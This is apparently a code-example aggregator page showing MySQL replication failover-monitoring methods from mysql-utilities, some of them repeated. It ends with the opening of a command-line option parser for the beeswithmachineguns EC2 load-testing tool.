        # Main loop - loop and fire on interval.
        done = False
        first_pass = True
        failover = False

        while not done:
            # Use try block in case master class has gone away.
            try:
                old_host = self.rpl.master.host
                old_port = self.rpl.master.port
            except:
                old_host = "UNKNOWN"
                old_port = "UNKNOWN"

            # If a failover script is provided, check it else check master
            # using connectivity checks.
            if exec_fail is not None:
                # Execute failover check script
                if not os.path.exists(exec_fail):
                    self._report(no_exec_fail_msg, logging.CRITICAL, False)
                    raise UtilRplError(no_exec_fail_msg)
                else:
                    self._report("# Spawning external script for failover "
                                 "checking.")
                    res = execute_script(exec_fail, None,
                                         [old_host, old_port],
                                         self.rpl.verbose)
                    if res == 0:
                        self._report("# Failover check script completed "
                                     "Ok. Failover averted.")
                    else:
                        self._report("# Failover check script failed. "
                                     "Failover initiated", logging.WARN)
                        failover = True
            else:
                # Check the master. If not alive, wait for pingtime seconds
                # and try again.
                if self.rpl.topology.master is not None and \
                   not self.rpl.topology.master.is_alive():
                    msg = ("Master may be down. Waiting for {0} seconds."
                           "".format(pingtime))
                    self._report(msg, logging.INFO, False)
                    time.sleep(pingtime)
                    try:
                        self.rpl.topology.master.connect()
                    except:
                        pass

                # Check the master again. If no connection or lost connection,
                # try ping. This performs the timeout threshold for detecting
                # a down master. If still not alive, try to reconnect and if
                # connection fails after 3 attempts, failover.
                if self.rpl.topology.master is None or \
                   not ping_host(self.rpl.topology.master.host, pingtime) or \
                   not self.rpl.topology.master.is_alive():
                    failover = True
                    if self._reconnect_master(self.pingtime):
                        failover = False  # Master is now connected again
                    if failover:
                        self._report("Failed to reconnect to the master after "
                                     "3 attemps.", logging.INFO)

            if failover:
                self._report("Master is confirmed to be down or "
                             "unreachable.", logging.CRITICAL, False)
                try:
                    self.rpl.topology.master.disconnect()
                except:
                    pass

                if failover_mode == "auto":
                    self._report("Failover starting in 'auto' mode...")
                    res = self.rpl.topology.failover(self.rpl.candidates,
                                                     False)
                elif failover_mode == "elect":
                    self._report("Failover starting in 'elect' mode...")
                    res = self.rpl.topology.failover(self.rpl.candidates, True)
                else:
                    msg = _FAILOVER_ERROR.format("Master has failed and "
                                                 "automatic failover is "
                                                 "not enabled. ")
                    self._report(msg, logging.CRITICAL, False)
                    # Execute post failover script
                    self.rpl.topology.run_script(post_fail, False,
                                                 [old_host, old_port])
                    raise UtilRplError(msg, _FAILOVER_ERRNO)
                if not res:
                    msg = _FAILOVER_ERROR.format("An error was encountered "
                                                 "during failover. ")
                    self._report(msg, logging.CRITICAL, False)
                    # Execute post failover script
                    self.rpl.topology.run_script(post_fail, False,
                                                 [old_host, old_port])
                    raise UtilRplError(msg)
                self.rpl.master = self.rpl.topology.master
                self.master = self.rpl.master
                self.rpl.topology.remove_discovered_slaves()
                self.rpl.topology.discover_slaves()
                self.list_data = None
                print("\nFailover daemon will restart in 5 seconds.")
                time.sleep(5)
                failover = False
                # Execute post failover script
                self.rpl.topology.run_script(post_fail, False,
                                             [old_host, old_port,
                                              self.rpl.master.host,
                                              self.rpl.master.port])

                # Unregister existing instances from slaves
                self._report("Unregistering existing instances from slaves.",
                             logging.INFO, False)
                self.unregister_slaves(self.rpl.topology)

                # Register instance on the new master
                msg = ("Registering instance on new master "
                       "{0}:{1}.").format(self.master.host, self.master.port)
                self._report(msg, logging.INFO, False)

                failover_mode = self.register_instance()

            # discover slaves if option was specified at startup
            elif (self.options.get("discover", None) is not None
                  and not first_pass):
                # Force refresh of health list if new slaves found
                if self.rpl.topology.discover_slaves():
                    self.list_data = None

            # Check existence of errant transactions on slaves
            errant_tnx = self.rpl.topology.find_errant_transactions()
            if errant_tnx:
                if pedantic:
                    print("# WARNING: {0}".format(_ERRANT_TNX_ERROR))
                    self._report(_ERRANT_TNX_ERROR, logging.WARN, False)
                    for host, port, tnx_set in errant_tnx:
                        errant_msg = (" - For slave '{0}@{1}': "
                                      "{2}".format(host, port,
                                                   ", ".join(tnx_set)))
                        print("# {0}".format(errant_msg))
                        self._report(errant_msg, logging.WARN, False)

                    # Raise an exception (to stop) if pedantic mode is ON
                    raise UtilRplError("{0} Note: If you want to ignore this "
                                       "issue, please do not use the "
                                       "--pedantic "
                                       "option.".format(_ERRANT_TNX_ERROR))
                else:
                    if self.rpl.logging:
                        warn_msg = ("{0} Check log for more "
                                    "details.".format(_ERRANT_TNX_ERROR))
                    else:
                        warn_msg = _ERRANT_TNX_ERROR
                    self.add_warning("errant_tnx", warn_msg)
                    self._report(_ERRANT_TNX_ERROR, logging.WARN, False)
                    for host, port, tnx_set in errant_tnx:
                        errant_msg = (" - For slave '{0}@{1}': "
                                      "{2}".format(host, port,
                                                   ", ".join(tnx_set)))
                        self._report(errant_msg, logging.WARN, False)
            else:
                self.del_warning("errant_tnx")

            if self.master and self.master.is_alive():
                # Log status
                self._print_warnings()
                self._log_master_status()

                self.list_data = []
                if "health" in self.report_values:
                    (health_labels, health_data) = self._format_health_data()
                    if health_data:
                        self._log_data("Health Status:", health_labels,
                                       health_data)
                if "gtid" in self.report_values:
                    (gtid_labels, gtid_data) = self._format_gtid_data()
                    for i, v in enumerate(gtid_data):
                        if v:
                            self._log_data("GTID Status - {0}"
                                           "".format(_GTID_LISTS[i]),
                                           gtid_labels, v)
                if "uuid" in self.report_values:
                    (uuid_labels, uuid_data) = self._format_uuid_data()
                    if uuid_data:
                        self._log_data("UUID Status:", uuid_labels, uuid_data)

            # Disconnect the master while waiting for the interval to expire
            self.master.disconnect()

            # Wait for the interval to expire
            time.sleep(self.interval)

            # Reconnect to the master
            self._reconnect_master(self.pingtime)

            first_pass = False

        return True

Example 44

Project: mysql-utilities
Source File: rpl_admin.py
View license
    def run_auto_failover(self, console, failover_mode="auto"):
        """Run automatic failover

        This method implements the automatic failover facility. It uses the
        FailoverConsole class from the failover_console.py to implement all
        user interface commands and uses the existing failover() method of
        this class to conduct failover.

        When the master goes down, the method can perform one of three actions:

        1) failover to list of candidates first then slaves
        2) failover to list of candidates only
        3) fail

        console[in]    instance of the failover console class.

        Returns bool - True = success, raises exception on error
        """
        pingtime = self.options.get("pingtime", 3)
        exec_fail = self.options.get("exec_fail", None)
        post_fail = self.options.get("post_fail", None)
        pedantic = self.options.get('pedantic', False)
        fail_retry = self.options.get('fail_retry', None)

        # Only works for GTID_MODE=ON
        if not self.topology.gtid_enabled():
            msg = "Topology must support global transaction ids " + \
                  "and have GTID_MODE=ON."
            self._report(msg, logging.CRITICAL)
            raise UtilRplError(msg)

        # Require --master-info-repository=TABLE for all slaves
        if not self.topology.check_master_info_type("TABLE"):
            msg = "Failover requires --master-info-repository=TABLE for " + \
                  "all slaves."
            self._report(msg, logging.ERROR, False)
            raise UtilRplError(msg)

        # Check for mixing IP and hostnames
        if not self._check_host_references():
            print("# WARNING: {0}".format(HOST_IP_WARNING))
            self._report(HOST_IP_WARNING, logging.WARN, False)
            print("#\n# Failover console will start in {0} seconds.".format(
                WARNING_SLEEP_TIME))
            time.sleep(WARNING_SLEEP_TIME)

        # Check existence of errant transactions on slaves
        errant_tnx = self.topology.find_errant_transactions()
        if errant_tnx:
            print("# WARNING: {0}".format(_ERRANT_TNX_ERROR))
            self._report(_ERRANT_TNX_ERROR, logging.WARN, False)
            for host, port, tnx_set in errant_tnx:
                errant_msg = (" - For slave '{0}@{1}': "
                              "{2}".format(host, port, ", ".join(tnx_set)))
                print("# {0}".format(errant_msg))
                self._report(errant_msg, logging.WARN, False)
            # Raise an exception (to stop) if pedantic mode is ON
            if pedantic:
                raise UtilRplError("{0} Note: If you want to ignore this "
                                   "issue, please do not use the --pedantic "
                                   "option.".format(_ERRANT_TNX_ERROR))

        self._report("Failover console started.", logging.INFO, False)
        self._report("Failover mode = %s." % failover_mode, logging.INFO,
                     False)

        # Main loop - loop and fire on interval.
        done = False
        first_pass = True
        failover = False
        while not done:
            # Use try block in case master class has gone away.
            try:
                old_host = self.master.host
                old_port = self.master.port
            except:
                old_host = "UNKNOWN"
                old_port = "UNKNOWN"

            # If a failover script is provided, check it else check master
            # using connectivity checks.
            if exec_fail is not None:
                # Execute failover check script
                if not os.path.isfile(exec_fail):
                    message = EXTERNAL_SCRIPT_DOES_NOT_EXIST.format(
                        path=exec_fail)
                    self._report(message, logging.CRITICAL, False)
                    raise UtilRplError(message)
                elif not os.access(exec_fail, os.X_OK):
                    message = INSUFFICIENT_FILE_PERMISSIONS.format(
                        path=exec_fail, permissions='execute')
                    self._report(message, logging.CRITICAL, False)
                    raise UtilRplError(message)
                else:
                    self._report("# Spawning external script for failover "
                                 "checking.")
                    res = execute_script(exec_fail, None,
                                         [old_host, old_port], self.verbose)
                    if res == 0:
                        self._report("# Failover check script completed Ok. "
                                     "Failover averted.")
                    else:
                        self._report("# Failover check script failed. "
                                     "Failover initiated", logging.WARN)
                        failover = True
            else:
                # Check the master. If not alive, wait for pingtime seconds
                # and try again.
                if self.topology.master is not None and \
                   not self.topology.master.is_alive():
                    msg = "Master may be down. Waiting for %s seconds." % \
                          pingtime
                    self._report(msg, logging.INFO, False)
                    time.sleep(pingtime)
                    try:
                        self.topology.master.connect()
                    except:
                        pass

                # If user specified a master fail retry, wait for the
                # predetermined time and attempt to check the master again.
                if fail_retry is not None and \
                   not self.topology.master.is_alive():
                    msg = "Master is still not reachable. Waiting for %s " \
                          "seconds to retry detection." % fail_retry
                    self._report(msg, logging.INFO, False)
                    time.sleep(fail_retry)
                    try:
                        self.topology.master.connect()
                    except:
                        pass

                # Check the master again. If no connection or lost connection,
                # try ping. This performs the timeout threshold for detecting
                # a down master. If still not alive, try to reconnect and if
                # connection fails after 3 attempts, failover.
                if self.topology.master is None or \
                   not ping_host(self.topology.master.host, pingtime) or \
                   not self.topology.master.is_alive():
                    failover = True
                    i = 0
                    while i < 3:
                        try:
                            self.topology.master.connect()
                            failover = False  # Master is now connected again
                            break
                        except:
                            pass
                        time.sleep(pingtime)
                        i += 1

                    if failover:
                        self._report("Failed to reconnect to the master after "
                                     "3 attemps.", logging.INFO)
                    else:
                        self._report("Master is Ok. Resuming watch.",
                                     logging.INFO)

            if failover:
                self._report("Master is confirmed to be down or unreachable.",
                             logging.CRITICAL, False)
                try:
                    self.topology.master.disconnect()
                except:
                    pass
                console.clear()
                if failover_mode == 'auto':
                    self._report("Failover starting in 'auto' mode...")
                    res = self.topology.failover(self.candidates, False)
                elif failover_mode == 'elect':
                    self._report("Failover starting in 'elect' mode...")
                    res = self.topology.failover(self.candidates, True)
                else:
                    msg = _FAILOVER_ERROR % ("Master has failed and automatic "
                                             "failover is not enabled. ")
                    self._report(msg, logging.CRITICAL, False)
                    # Execute post failover script
                    self.topology.run_script(post_fail, False,
                                             [old_host, old_port])
                    raise UtilRplError(msg, _FAILOVER_ERRNO)
                if not res:
                    msg = _FAILOVER_ERROR % ("An error was encountered "
                                             "during failover. ")
                    self._report(msg, logging.CRITICAL, False)
                    # Execute post failover script
                    self.topology.run_script(post_fail, False,
                                             [old_host, old_port])
                    raise UtilRplError(msg)
                self.master = self.topology.master
                console.master = self.master
                self.topology.remove_discovered_slaves()
                self.topology.discover_slaves()
                console.list_data = None
                print "\nFailover console will restart in 5 seconds."
                time.sleep(5)
                console.clear()
                failover = False
                # Execute post failover script
                self.topology.run_script(post_fail, False,
                                         [old_host, old_port,
                                          self.master.host, self.master.port])

                # Unregister existing instances from slaves
                self._report("Unregistering existing instances from slaves.",
                             logging.INFO, False)
                console.unregister_slaves(self.topology)

                # Register instance on the new master
                self._report("Registering instance on master.", logging.INFO,
                             False)
                failover_mode = console.register_instance()

            # discover slaves if option was specified at startup
            elif (self.options.get("discover", None) is not None
                  and not first_pass):
                # Force refresh of health list if new slaves found
                if self.topology.discover_slaves():
                    console.list_data = None

            # Check existence of errant transactions on slaves
            errant_tnx = self.topology.find_errant_transactions()
            if errant_tnx:
                if pedantic:
                    print("# WARNING: {0}".format(_ERRANT_TNX_ERROR))
                    self._report(_ERRANT_TNX_ERROR, logging.WARN, False)
                    for host, port, tnx_set in errant_tnx:
                        errant_msg = (" - For slave '{0}@{1}': "
                                      "{2}".format(host, port,
                                                   ", ".join(tnx_set)))
                        print("# {0}".format(errant_msg))
                        self._report(errant_msg, logging.WARN, False)

                    # Raise an exception (to stop) if pedantic mode is ON
                    raise UtilRplError("{0} Note: If you want to ignore this "
                                       "issue, please do not use the "
                                       "--pedantic "
                                       "option.".format(_ERRANT_TNX_ERROR))
                else:
                    if self.logging:
                        warn_msg = ("{0} Check log for more "
                                    "details.".format(_ERRANT_TNX_ERROR))
                    else:
                        warn_msg = _ERRANT_TNX_ERROR
                    console.add_warning('errant_tnx', warn_msg)
                    self._report(_ERRANT_TNX_ERROR, logging.WARN, False)
                    for host, port, tnx_set in errant_tnx:
                        errant_msg = (" - For slave '{0}@{1}': "
                                      "{2}".format(host, port,
                                                   ", ".join(tnx_set)))
                        self._report(errant_msg, logging.WARN, False)
            else:
                console.del_warning('errant_tnx')

            res = console.display_console()
            if res is not None:    # None = normal timeout, keep going
                if not res:
                    return False   # Errors detected
                done = True        # User has quit
            first_pass = False

        return True

Example 45

Project: mysql-utilities
Source File: failover_daemon.py
View license
    def run(self):
        """Run automatic failover.

        This method implements the automatic failover facility. It the existing
        failover() method of the RplCommands class to conduct failover.

        When the master goes down, the method can perform one of three actions:

        1) failover to list of candidates first then slaves
        2) failover to list of candidates only
        3) fail

        rpl[in]        instance of the RplCommands class
        interval[in]   time in seconds to wait to check status of servers

        Returns bool - True = success, raises exception on error
        """
        failover_mode = self.mode
        pingtime = self.options.get("pingtime", 3)
        exec_fail = self.options.get("exec_fail", None)
        post_fail = self.options.get("post_fail", None)
        pedantic = self.options.get("pedantic", False)

        # Only works for GTID_MODE=ON
        if not self.rpl.topology.gtid_enabled():
            msg = ("Topology must support global transaction ids and have "
                   "GTID_MODE=ON.")
            self._report(msg, logging.CRITICAL)
            raise UtilRplError(msg)

        # Require --master-info-repository=TABLE for all slaves
        if not self.rpl.topology.check_master_info_type("TABLE"):
            msg = ("Failover requires --master-info-repository=TABLE for "
                   "all slaves.")
            self._report(msg, logging.ERROR, False)
            raise UtilRplError(msg)

        # Check for mixing IP and hostnames
        if not self.rpl.check_host_references():
            print("# WARNING: {0}".format(HOST_IP_WARNING))
            self._report(HOST_IP_WARNING, logging.WARN, False)
            print("#\n# Failover daemon will start in 10 seconds.")
            time.sleep(10)

        # Test failover script. If it doesn't exist, fail.
        no_exec_fail_msg = ("Failover check script cannot be found. Please "
                            "check the path and filename for accuracy and "
                            "restart the failover daemon.")
        if exec_fail is not None and not os.path.exists(exec_fail):
            self._report(no_exec_fail_msg, logging.CRITICAL, False)
            raise UtilRplError(no_exec_fail_msg)

        # Check existence of errant transactions on slaves
        errant_tnx = self.rpl.topology.find_errant_transactions()
        if errant_tnx:
            print("# WARNING: {0}".format(_ERRANT_TNX_ERROR))
            self._report(_ERRANT_TNX_ERROR, logging.WARN, False)
            for host, port, tnx_set in errant_tnx:
                errant_msg = (" - For slave '{0}@{1}': "
                              "{2}".format(host, port, ", ".join(tnx_set)))
                print("# {0}".format(errant_msg))
                self._report(errant_msg, logging.WARN, False)
            # Raise an exception (to stop) if pedantic mode is ON
            if pedantic:
                msg = ("{0} Note: If you want to ignore this issue, please do "
                       "not use the --pedantic option."
                       "".format(_ERRANT_TNX_ERROR))
                self._report(msg, logging.CRITICAL)
                raise UtilRplError(msg)

        self._report("Failover daemon started.", logging.INFO, False)
        self._report("Failover mode = {0}.".format(failover_mode),
                     logging.INFO, False)

        # Main loop - loop and fire on interval.
        done = False
        first_pass = True
        failover = False

        while not done:
            # Use try block in case master class has gone away.
            try:
                old_host = self.rpl.master.host
                old_port = self.rpl.master.port
            except:
                old_host = "UNKNOWN"
                old_port = "UNKNOWN"

            # If a failover script is provided, check it else check master
            # using connectivity checks.
            if exec_fail is not None:
                # Execute failover check script
                if not os.path.exists(exec_fail):
                    self._report(no_exec_fail_msg, logging.CRITICAL, False)
                    raise UtilRplError(no_exec_fail_msg)
                else:
                    self._report("# Spawning external script for failover "
                                 "checking.")
                    res = execute_script(exec_fail, None,
                                         [old_host, old_port],
                                         self.rpl.verbose)
                    if res == 0:
                        self._report("# Failover check script completed "
                                     "Ok. Failover averted.")
                    else:
                        self._report("# Failover check script failed. "
                                     "Failover initiated", logging.WARN)
                        failover = True
            else:
                # Check the master. If not alive, wait for pingtime seconds
                # and try again.
                if self.rpl.topology.master is not None and \
                   not self.rpl.topology.master.is_alive():
                    msg = ("Master may be down. Waiting for {0} seconds."
                           "".format(pingtime))
                    self._report(msg, logging.INFO, False)
                    time.sleep(pingtime)
                    try:
                        self.rpl.topology.master.connect()
                    except:
                        pass

                # Check the master again. If no connection or lost connection,
                # try ping. This performs the timeout threshold for detecting
                # a down master. If still not alive, try to reconnect and if
                # connection fails after 3 attempts, failover.
                if self.rpl.topology.master is None or \
                   not ping_host(self.rpl.topology.master.host, pingtime) or \
                   not self.rpl.topology.master.is_alive():
                    failover = True
                    if self._reconnect_master(self.pingtime):
                        failover = False  # Master is now connected again
                    if failover:
                        self._report("Failed to reconnect to the master after "
                                     "3 attemps.", logging.INFO)

            if failover:
                self._report("Master is confirmed to be down or "
                             "unreachable.", logging.CRITICAL, False)
                try:
                    self.rpl.topology.master.disconnect()
                except:
                    pass

                if failover_mode == "auto":
                    self._report("Failover starting in 'auto' mode...")
                    res = self.rpl.topology.failover(self.rpl.candidates,
                                                     False)
                elif failover_mode == "elect":
                    self._report("Failover starting in 'elect' mode...")
                    res = self.rpl.topology.failover(self.rpl.candidates, True)
                else:
                    msg = _FAILOVER_ERROR.format("Master has failed and "
                                                 "automatic failover is "
                                                 "not enabled. ")
                    self._report(msg, logging.CRITICAL, False)
                    # Execute post failover script
                    self.rpl.topology.run_script(post_fail, False,
                                                 [old_host, old_port])
                    raise UtilRplError(msg, _FAILOVER_ERRNO)
                if not res:
                    msg = _FAILOVER_ERROR.format("An error was encountered "
                                                 "during failover. ")
                    self._report(msg, logging.CRITICAL, False)
                    # Execute post failover script
                    self.rpl.topology.run_script(post_fail, False,
                                                 [old_host, old_port])
                    raise UtilRplError(msg)
                self.rpl.master = self.rpl.topology.master
                self.master = self.rpl.master
                self.rpl.topology.remove_discovered_slaves()
                self.rpl.topology.discover_slaves()
                self.list_data = None
                print("\nFailover daemon will restart in 5 seconds.")
                time.sleep(5)
                failover = False
                # Execute post failover script
                self.rpl.topology.run_script(post_fail, False,
                                             [old_host, old_port,
                                              self.rpl.master.host,
                                              self.rpl.master.port])

                # Unregister existing instances from slaves
                self._report("Unregistering existing instances from slaves.",
                             logging.INFO, False)
                self.unregister_slaves(self.rpl.topology)

                # Register instance on the new master
                msg = ("Registering instance on new master "
                       "{0}:{1}.").format(self.master.host, self.master.port)
                self._report(msg, logging.INFO, False)

                failover_mode = self.register_instance()

            # discover slaves if option was specified at startup
            elif (self.options.get("discover", None) is not None
                  and not first_pass):
                # Force refresh of health list if new slaves found
                if self.rpl.topology.discover_slaves():
                    self.list_data = None

            # Check existence of errant transactions on slaves
            errant_tnx = self.rpl.topology.find_errant_transactions()
            if errant_tnx:
                if pedantic:
                    print("# WARNING: {0}".format(_ERRANT_TNX_ERROR))
                    self._report(_ERRANT_TNX_ERROR, logging.WARN, False)
                    for host, port, tnx_set in errant_tnx:
                        errant_msg = (" - For slave '{0}@{1}': "
                                      "{2}".format(host, port,
                                                   ", ".join(tnx_set)))
                        print("# {0}".format(errant_msg))
                        self._report(errant_msg, logging.WARN, False)

                    # Raise an exception (to stop) if pedantic mode is ON
                    raise UtilRplError("{0} Note: If you want to ignore this "
                                       "issue, please do not use the "
                                       "--pedantic "
                                       "option.".format(_ERRANT_TNX_ERROR))
                else:
                    if self.rpl.logging:
                        warn_msg = ("{0} Check log for more "
                                    "details.".format(_ERRANT_TNX_ERROR))
                    else:
                        warn_msg = _ERRANT_TNX_ERROR
                    self.add_warning("errant_tnx", warn_msg)
                    self._report(_ERRANT_TNX_ERROR, logging.WARN, False)
                    for host, port, tnx_set in errant_tnx:
                        errant_msg = (" - For slave '{0}@{1}': "
                                      "{2}".format(host, port,
                                                   ", ".join(tnx_set)))
                        self._report(errant_msg, logging.WARN, False)
            else:
                self.del_warning("errant_tnx")

            if self.master and self.master.is_alive():
                # Log status
                self._print_warnings()
                self._log_master_status()

                self.list_data = []
                if "health" in self.report_values:
                    (health_labels, health_data) = self._format_health_data()
                    if health_data:
                        self._log_data("Health Status:", health_labels,
                                       health_data)
                if "gtid" in self.report_values:
                    (gtid_labels, gtid_data) = self._format_gtid_data()
                    for i, v in enumerate(gtid_data):
                        if v:
                            self._log_data("GTID Status - {0}"
                                           "".format(_GTID_LISTS[i]),
                                           gtid_labels, v)
                if "uuid" in self.report_values:
                    (uuid_labels, uuid_data) = self._format_uuid_data()
                    if uuid_data:
                        self._log_data("UUID Status:", uuid_labels, uuid_data)

            # Disconnect the master while waiting for the interval to expire
            self.master.disconnect()

            # Wait for the interval to expire
            time.sleep(self.interval)

            # Reconnect to the master
            self._reconnect_master(self.pingtime)

            first_pass = False

        return True

Example 46

Project: mysql-utilities
Source File: rpl_admin.py
View license
    def run_auto_failover(self, console, failover_mode="auto"):
        """Run automatic failover

        This method implements the automatic failover facility. It uses the
        FailoverConsole class from the failover_console.py to implement all
        user interface commands and uses the existing failover() method of
        this class to conduct failover.

        When the master goes down, the method can perform one of three actions:

        1) failover to list of candidates first then slaves
        2) failover to list of candidates only
        3) fail

        console[in]    instance of the failover console class.

        Returns bool - True = success, raises exception on error
        """
        pingtime = self.options.get("pingtime", 3)
        exec_fail = self.options.get("exec_fail", None)
        post_fail = self.options.get("post_fail", None)
        pedantic = self.options.get('pedantic', False)
        fail_retry = self.options.get('fail_retry', None)

        # Only works for GTID_MODE=ON
        if not self.topology.gtid_enabled():
            msg = "Topology must support global transaction ids " + \
                  "and have GTID_MODE=ON."
            self._report(msg, logging.CRITICAL)
            raise UtilRplError(msg)

        # Require --master-info-repository=TABLE for all slaves
        if not self.topology.check_master_info_type("TABLE"):
            msg = "Failover requires --master-info-repository=TABLE for " + \
                  "all slaves."
            self._report(msg, logging.ERROR, False)
            raise UtilRplError(msg)

        # Check for mixing IP and hostnames
        if not self._check_host_references():
            print("# WARNING: {0}".format(HOST_IP_WARNING))
            self._report(HOST_IP_WARNING, logging.WARN, False)
            print("#\n# Failover console will start in {0} seconds.".format(
                WARNING_SLEEP_TIME))
            time.sleep(WARNING_SLEEP_TIME)

        # Check existence of errant transactions on slaves
        errant_tnx = self.topology.find_errant_transactions()
        if errant_tnx:
            print("# WARNING: {0}".format(_ERRANT_TNX_ERROR))
            self._report(_ERRANT_TNX_ERROR, logging.WARN, False)
            for host, port, tnx_set in errant_tnx:
                errant_msg = (" - For slave '{0}@{1}': "
                              "{2}".format(host, port, ", ".join(tnx_set)))
                print("# {0}".format(errant_msg))
                self._report(errant_msg, logging.WARN, False)
            # Raise an exception (to stop) if pedantic mode is ON
            if pedantic:
                raise UtilRplError("{0} Note: If you want to ignore this "
                                   "issue, please do not use the --pedantic "
                                   "option.".format(_ERRANT_TNX_ERROR))

        self._report("Failover console started.", logging.INFO, False)
        self._report("Failover mode = %s." % failover_mode, logging.INFO,
                     False)

        # Main loop - loop and fire on interval.
        done = False
        first_pass = True
        failover = False
        while not done:
            # Use try block in case master class has gone away.
            try:
                old_host = self.master.host
                old_port = self.master.port
            except:
                old_host = "UNKNOWN"
                old_port = "UNKNOWN"

            # If a failover script is provided, check it else check master
            # using connectivity checks.
            if exec_fail is not None:
                # Execute failover check script
                if not os.path.isfile(exec_fail):
                    message = EXTERNAL_SCRIPT_DOES_NOT_EXIST.format(
                        path=exec_fail)
                    self._report(message, logging.CRITICAL, False)
                    raise UtilRplError(message)
                elif not os.access(exec_fail, os.X_OK):
                    message = INSUFFICIENT_FILE_PERMISSIONS.format(
                        path=exec_fail, permissions='execute')
                    self._report(message, logging.CRITICAL, False)
                    raise UtilRplError(message)
                else:
                    self._report("# Spawning external script for failover "
                                 "checking.")
                    res = execute_script(exec_fail, None,
                                         [old_host, old_port], self.verbose)
                    if res == 0:
                        self._report("# Failover check script completed Ok. "
                                     "Failover averted.")
                    else:
                        self._report("# Failover check script failed. "
                                     "Failover initiated", logging.WARN)
                        failover = True
            else:
                # Check the master. If not alive, wait for pingtime seconds
                # and try again.
                if self.topology.master is not None and \
                   not self.topology.master.is_alive():
                    msg = "Master may be down. Waiting for %s seconds." % \
                          pingtime
                    self._report(msg, logging.INFO, False)
                    time.sleep(pingtime)
                    try:
                        self.topology.master.connect()
                    except:
                        pass

                # If user specified a master fail retry, wait for the
                # predetermined time and attempt to check the master again.
                if fail_retry is not None and \
                   not self.topology.master.is_alive():
                    msg = "Master is still not reachable. Waiting for %s " \
                          "seconds to retry detection." % fail_retry
                    self._report(msg, logging.INFO, False)
                    time.sleep(fail_retry)
                    try:
                        self.topology.master.connect()
                    except:
                        pass

                # Check the master again. If no connection or lost connection,
                # try ping. This performs the timeout threshold for detecting
                # a down master. If still not alive, try to reconnect and if
                # connection fails after 3 attempts, failover.
                if self.topology.master is None or \
                   not ping_host(self.topology.master.host, pingtime) or \
                   not self.topology.master.is_alive():
                    failover = True
                    i = 0
                    while i < 3:
                        try:
                            self.topology.master.connect()
                            failover = False  # Master is now connected again
                            break
                        except:
                            pass
                        time.sleep(pingtime)
                        i += 1

                    if failover:
                        self._report("Failed to reconnect to the master after "
                                     "3 attemps.", logging.INFO)
                    else:
                        self._report("Master is Ok. Resuming watch.",
                                     logging.INFO)

            if failover:
                self._report("Master is confirmed to be down or unreachable.",
                             logging.CRITICAL, False)
                try:
                    self.topology.master.disconnect()
                except:
                    pass
                console.clear()
                if failover_mode == 'auto':
                    self._report("Failover starting in 'auto' mode...")
                    res = self.topology.failover(self.candidates, False)
                elif failover_mode == 'elect':
                    self._report("Failover starting in 'elect' mode...")
                    res = self.topology.failover(self.candidates, True)
                else:
                    msg = _FAILOVER_ERROR % ("Master has failed and automatic "
                                             "failover is not enabled. ")
                    self._report(msg, logging.CRITICAL, False)
                    # Execute post failover script
                    self.topology.run_script(post_fail, False,
                                             [old_host, old_port])
                    raise UtilRplError(msg, _FAILOVER_ERRNO)
                if not res:
                    msg = _FAILOVER_ERROR % ("An error was encountered "
                                             "during failover. ")
                    self._report(msg, logging.CRITICAL, False)
                    # Execute post failover script
                    self.topology.run_script(post_fail, False,
                                             [old_host, old_port])
                    raise UtilRplError(msg)
                self.master = self.topology.master
                console.master = self.master
                self.topology.remove_discovered_slaves()
                self.topology.discover_slaves()
                console.list_data = None
                print "\nFailover console will restart in 5 seconds."
                time.sleep(5)
                console.clear()
                failover = False
                # Execute post failover script
                self.topology.run_script(post_fail, False,
                                         [old_host, old_port,
                                          self.master.host, self.master.port])

                # Unregister existing instances from slaves
                self._report("Unregistering existing instances from slaves.",
                             logging.INFO, False)
                console.unregister_slaves(self.topology)

                # Register instance on the new master
                self._report("Registering instance on master.", logging.INFO,
                             False)
                failover_mode = console.register_instance()

            # discover slaves if option was specified at startup
            elif (self.options.get("discover", None) is not None
                  and not first_pass):
                # Force refresh of health list if new slaves found
                if self.topology.discover_slaves():
                    console.list_data = None

            # Check existence of errant transactions on slaves
            errant_tnx = self.topology.find_errant_transactions()
            if errant_tnx:
                if pedantic:
                    print("# WARNING: {0}".format(_ERRANT_TNX_ERROR))
                    self._report(_ERRANT_TNX_ERROR, logging.WARN, False)
                    for host, port, tnx_set in errant_tnx:
                        errant_msg = (" - For slave '{0}@{1}': "
                                      "{2}".format(host, port,
                                                   ", ".join(tnx_set)))
                        print("# {0}".format(errant_msg))
                        self._report(errant_msg, logging.WARN, False)

                    # Raise an exception (to stop) if pedantic mode is ON
                    raise UtilRplError("{0} Note: If you want to ignore this "
                                       "issue, please do not use the "
                                       "--pedantic "
                                       "option.".format(_ERRANT_TNX_ERROR))
                else:
                    if self.logging:
                        warn_msg = ("{0} Check log for more "
                                    "details.".format(_ERRANT_TNX_ERROR))
                    else:
                        warn_msg = _ERRANT_TNX_ERROR
                    console.add_warning('errant_tnx', warn_msg)
                    self._report(_ERRANT_TNX_ERROR, logging.WARN, False)
                    for host, port, tnx_set in errant_tnx:
                        errant_msg = (" - For slave '{0}@{1}': "
                                      "{2}".format(host, port,
                                                   ", ".join(tnx_set)))
                        self._report(errant_msg, logging.WARN, False)
            else:
                console.del_warning('errant_tnx')

            res = console.display_console()
            if res is not None:    # None = normal timeout, keep going
                if not res:
                    return False   # Errors detected
                done = True        # User has quit
            first_pass = False

        return True

Example 47

Project: beeswithmachineguns
Source File: main.py
View license
def parse_options():
    """
    Handle the command line arguments for spinning up bees
    """
    parser = OptionParser(usage="""
bees COMMAND [options]

Bees with Machine Guns

A utility for arming (creating) many bees (small EC2 instances) to attack
(load test) targets (web applications).

commands:
  up      Start a batch of load testing servers.
  attack  Begin the attack on a specific url.
  down    Shutdown and deactivate the load testing servers.
  report  Report the status of the load testing servers.
    """)

    up_group = OptionGroup(parser, "up",
                           """In order to spin up new servers you will need to specify at least the -k command, which is the name of the EC2 keypair to use for creating and connecting to the new servers. The bees will expect to find a .pem file with this name in ~/.ssh/. Alternatively, bees can use SSH Agent for the key.""")

    # Required
    up_group.add_option('-k', '--key',  metavar="KEY",  nargs=1,
                        action='store', dest='key', type='string',
                        help="The ssh key pair name to use to connect to the new servers.")

    up_group.add_option('-s', '--servers', metavar="SERVERS", nargs=1,
                        action='store', dest='servers', type='int', default=5,
                        help="The number of servers to start (default: 5).")
    up_group.add_option('-g', '--group', metavar="GROUP", nargs=1,
                        action='store', dest='group', type='string', default='default',
                        help="The security group(s) to run the instances under (default: default).")
    up_group.add_option('-z', '--zone',  metavar="ZONE",  nargs=1,
                        action='store', dest='zone', type='string', default='us-east-1d',
